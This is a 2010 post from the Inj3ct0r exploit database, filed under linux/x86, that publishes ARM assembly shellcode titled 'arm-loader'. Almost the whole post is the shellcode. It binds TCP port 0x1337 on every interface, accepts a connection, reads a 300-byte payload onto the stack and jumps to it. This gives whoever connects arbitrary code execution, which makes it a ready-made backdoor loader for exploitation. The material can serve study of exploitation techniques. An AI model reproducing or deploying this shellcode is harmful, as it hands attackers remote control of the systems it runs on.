[linux/x86] - linux/ARM - Loader Port 0x1337 Shellcode
Posted on 26 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>linux/ARM - Loader Port 0x1337 Shellcode | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='linux/ARM - Loader Port 0x1337 Shellcode by Daniel Godas-Lope. in linux/x86 | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================== linux/ARM - Loader Port 0x1337 Shellcode ======================================== /* * Title: arm-loader * Brief: Bind port 0x1337 on any local interface, listen for a connection * receive a payload, and pass execution to it * Author: Daniel Godas-Lopez <gmail account dgodas> */ /* soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); */ mov %r0, $2 /* AF_INET */ mov %r1, $1 /* SOCK_STREAM */ mov %r2, $6 /* IPPRTOTO_TCP */ push {%r0, %r1, %r2} mov %r0, $1 /* socket */ mov %r1, %sp svc 0x00900066 add %sp, %sp, $12 mov %r6, %r0 /* r6 = soc_des */ /* bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); */ .if 0 /* r0 == r6 already */ mov %r0, %r6 /* soc_des */ .endif mov %r1, $0x37 mov %r7, $0x13 mov %r1, %r1, lsl $24 add %r1, %r7, lsl $16 add %r1, $2 /* port = 0x1337, family = 2 (AF_INET) */ sub %r2, %r2, %r2 /* addr = 0.0.0.0 */ push {%r1, %r2} mov %r1, %sp /* pointer to sockaddr_in */ mov %r2, $16 /* sizeof(struct sockaddr_in) */ push {%r0, %r1, %r2} mov %r0, $2 /* bind */ mov %r1, %sp svc 0x00900066 add %sp, %sp, $20 /* listen(soc_des, 1); /* mov %r1, $1 /* backlog (see man 2 listen) */ mov %r0, %r6 /* soc_des */ push {%r0, %r1} mov %r0, $4 /* listen */ mov %r1, %sp svc 0x00900066 add %sp, $8 /* soc_cli = accept(soc_des, 0, 0); */ mov %r0, %r6 /* soc_des */ sub %r1, %r1, %r1 sub %r2, %r2, %r2 push {%r0, %r1, %r2} mov %r0, $5 /* accept */ mov %r1, %sp svc 0x00900066 add %sp, %sp, $12 mov %r6, %r0 /* r6 = soc_cli */ /* recv(soc_des, buff, len, flags); */ sub %r4, %sp, $316 /* buffer on the stack + 16 bytes padding */ sub %r5, %r5, %r5 /* byte count */ 1: mov %r0, %r6 add %r1, %r4, %r5 /* dst pointer */ mov %r2, $300 /* 300 bytes */ mov %r3, $256 /* MSG_WAITALL */ push {%r0, %r1, %r2, %r3} mov %r0, $10 /* recv */ mov %r1, %sp svc 0x00900066 add %sp, %sp, $16 add %r5, %r0 cmp %r5, $300 bne 1b /* Jump into code */ mov %pc, %r4 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>
